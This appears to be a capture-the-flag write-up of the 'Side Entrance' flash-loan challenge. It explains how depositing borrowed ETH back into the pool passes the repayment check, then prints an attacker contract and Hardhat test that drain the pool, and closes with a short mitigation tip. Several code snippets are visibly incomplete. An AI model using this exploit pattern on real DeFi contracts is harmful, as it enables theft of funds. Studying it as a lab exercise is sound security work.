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The goal of this box is to siphon 1000ETHs in an existing lending pool.

Code Breakdown

Similiar to Truster box, it only has 1 smart contract SideEntranceLenderPool.sol. Let's start by looking at the variables.

using Address for address payable;
mapping (address => uint256) private balances;

The address variable uses openzeppelin library to offer more functions. Reference:

Whereas, a simple hashmap is made for balances where each address contains x amount of tokens in integer format. Reference:

The first function is an interface. It is empty and it contains an execute() function.

interface IFlashLoanEtherReceiver {
    function execute() external payable;

The next function is desposit. It is simple where it stores the value directly into the hashmap.

function deposit() external payable {
    balances[msg.sender] += msg.value;

Next, a withdraw() function is created for users to withdraw their tokens out to their wallet. Even though it does not have any reentrancy guard, it follows the best practice outlined by Solidity documentation - Checks-Effect-Interactions Pattern.

function withdraw() external {
    uint256 amountToWithdraw = balances[msg.sender];
    balances[msg.sender] = 0;

Lastly, flashLoan(uin256 amount) function is created. As usual, it checks if the pool have sufficient ETH for borrowing.

uint256 balanceBefore = address(this).balance;
require(balanceBefore >= amount, "Not enough ETH in balance");

Next, it executes an interface function .

IFlashLoanEtherReceiver(msg.sender).execute{value: amount}();

Lastly, it checks if the loan is returned to the lending pool.

require(address(this).balance >= balanceBefore, "Flash loan hasn't been paid back");        


First and foremost, there are two pool of funds - lending pool and individual balance pool. Both are identified based on their address. Here's the problem, the lending pool and individual balance pool have overlaps.

Consider this scenario: A lending pool has an address. Since it's an address, it have an individual lending balance pool too. Let's assign 10 ETH to the lending pool. Notice that the individual Balance pool is 0.

Lending Pool Lending Individual Balance Attacker Balance Pool Attacler Balance
10 ETH 0 ETH 0 ETH 0 ETH

This essentially means address(this).balance != balances(address(this)). Here's the loophole, if we deposit 10 ETH to the Lending Individual Balance, the Lending Pool will still reflect 10 ETH as the ETH was not transferred away from the Lending Pool. However, the function will add 10 ETH into the hashmap which will increase Lending Individual Balance by 10 ETH. Thus, both Lending Pool and Lending Individual Balance will have 10 ETHs respectively.

function deposit() external payable {
    balances[msg.sender] += msg.value;

Understanding this concept, we can also bypass the final check in the flashLoan function as address(this).balance refers to Lending Pool.

require(address(this).balance >= balanceBefore, "Flash loan hasn't been paid back");        

The result after flashLoan should look like this.

Lending Pool Lending Individual Balance Attacker Balance Pool Attacker Balance
10 ETH 10 ETH 0 ETH 0 ETH

Next, we'll withdraw ETHs with the function withdraw(). The function will remove all ETHs from Lending Individual Balance and transfer ETHs from Lending Pool to msg.sender. msg.sender should be coming from Attacker Balance Pool. Note: You may be thinking, Address.sol requires 2 parameters for the function sendValue yet I only see 1. This should clarify any doubts. payable(msg.sender).sendValue(amountToWithdraw); is the same as Address.sendValue(payable(msg.sender), amountToWithdraw);

function withdraw() external {
    uint256 amountToWithdraw = balances[msg.sender];
    balances[msg.sender] = 0;

Using that function should result in this.

Lending Pool Lending Individual Balance Attacker Balance Pool Attacker Balance
0 ETH 0 ETH 10 ETH 0 ETH

Now, we'll shift the 10 ETHs from Attacker Balance Pool to Attacker Balance with a simple transaction which will yield the final result.

Lending Pool Lending Individual Balance Attacker Balance Pool Attacker Balance
0 ETH 0 ETH 0 ETH 10 ETH


Following the hints above, your smart contract should look similar to this.

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;
import "@openzeppelin/contracts/utils/Address.sol";
import "../side-entrance/SideEntranceLenderPool.sol";

 * @title SideEntranceAttacker
 * @author BingleBangle-BH's attacker contract

 contract SideEntranceAttacker{
    using Address for address payable;
    SideEntranceLenderPool public immutable pool;

    constructor (SideEntranceLenderPool _pool){
        pool = SideEntranceLenderPool(_pool);

    function execute() public payable{
        pool.deposit{value: msg.value}();

    function stealFunds() external{
        address _owner = msg.sender;

    receive () external payable {}

Here's the javascript

it('Exploit', async function () {
    const SideEntranceAttack = await ethers.getContractFactory('SideEntranceAttacker', attacker);
    this.attackpool = await SideEntranceAttack.deploy(this.pool.address);
    await this.attackpool.stealFunds();


Do not use allow two pools of funds to exist in a single smart contract. Use openzeppelin libraries such asERC20 to manage the funds.